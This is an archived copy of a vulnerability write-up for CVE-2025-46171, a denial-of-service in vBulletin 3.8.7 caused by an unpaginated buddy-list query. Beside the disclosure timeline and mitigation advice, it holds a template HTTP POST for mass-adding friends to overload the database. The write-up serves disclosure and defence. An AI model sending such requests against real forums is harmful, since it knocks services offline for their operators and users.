Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-46171 PoC — vBulletin 安全漏洞

Source
https://github.com/oiyl/CVE-2025-46171
Associated Vulnerability
Title:vBulletin 安全漏洞 (CVE-2025-46171)
Description:vBulletin 3.8.7 is vulnerable to a denial-of-service condition via the misc.php?do=buddylist endpoint. If an authenticated user has a sufficiently large buddy list, processing the list can consume excessive memory, exhausting system resources and crashing the forum.
Description
Writeup of a Denial of Service vulnerability in the vBulletin 3.8.7 friends list.
Readme

# vBulletin 3.x.x - DoS via Buddy List Overload

## Summary
The `/misc.php?do=buddylist` endpoint runs a single, large JOIN query that retrieves all buddies along with their user and session information to check online status. Because this query processes the entire buddy list without pagination or result limits, it becomes extremely resource-intensive and can overload the database when the list grows large.

This issue is easy to exploit and requires minimal setup. No special privileges are needed beyond a basic user account. Simply inflating the buddy list is enough to put serious strain on the database.


## Affected Versions
- ✅ **Confirmed vulnerable**: vBulletin 3.8.7  

## Technical Details

This SQL query retrieves buddy details along with session information to check online status for every buddy. Because it processes the entire buddy list and joins with session data for each entry, the query becomes very large and resource-intensive.

```php
$buddys = $db->query_read_slave("
    SELECT
        user.username,
        (user.options & " . $vbulletin->bf_misc_useroptions['invisible'] . ") AS invisible,
        user.userid,
        session.lastactivity
    FROM " . TABLE_PREFIX . "userlist AS userlist
    LEFT JOIN " . TABLE_PREFIX . "user AS user ON (user.userid = userlist.relationid)
    LEFT JOIN " . TABLE_PREFIX . "session AS session ON (session.userid = user.userid)
    WHERE userlist.userid = {$vbulletin->userinfo['userid']}
        AND userlist.relationid = user.userid
        AND type = 'buddy'
    ORDER BY username ASC, session.lastactivity DESC
");
```

## Timeline

* **April 17, 2025**: Vulnerability discovered
* **April 18, 2025**: CVE request submitted to MITRE
* **May 29, 2025**: CVE-2025-46171 assigned
* **June 27, 2025**: Public disclosure

## Exploitation

### Mass Adding Friends
Bulk friend lists can be populated by POSTing to `/profile.php` with `listbits`. This can be repeated for thousands of user IDs to inflate the buddy list:

```html
POST /profile.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

securitytoken=TOKEN
&ajax=1
&do=updatelist
&userlist=buddy
&listbits[buddy_original][USER_ID]=USER_ID
&listbits[buddy][USER_ID]=USER_ID
&listbits[friend][USER_ID]=USER_ID
&listbits[friend_original][USER_ID]=USER_ID
...
```

## Impact
On large forums, this can cause severe query lag or crash the MySQL instance altogether.

## Mitigation:
* Apply query pagination or limit the number of buddy entries retrieved per request
* Apply rate limiting and validation on buddy list modifications
File Snapshot

 [4.0K]  /data/pocs/e6e25203ff25c13264eaef5957450741574be6f4
└── [2.5K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →